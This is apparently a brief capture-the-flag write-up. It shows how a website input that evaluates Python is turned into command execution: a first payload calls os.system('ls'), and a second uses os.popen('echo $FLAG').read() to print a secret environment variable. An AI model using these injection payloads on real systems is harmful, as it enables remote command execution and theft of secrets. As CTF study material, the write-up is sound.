INPUT: ="PROVA"+os.system('ls')
OUTPUT: can only concatenate str (not "int) with str

Therefore we can execute python from website. But os.system return an integer
instead of the output of command.

From stackoverflow: os.popen("command").read() return the output of command:

INPUT: ="PROVA"+os.popen('echo $FLAG').read()
OUTPUT: "PROVA"+flag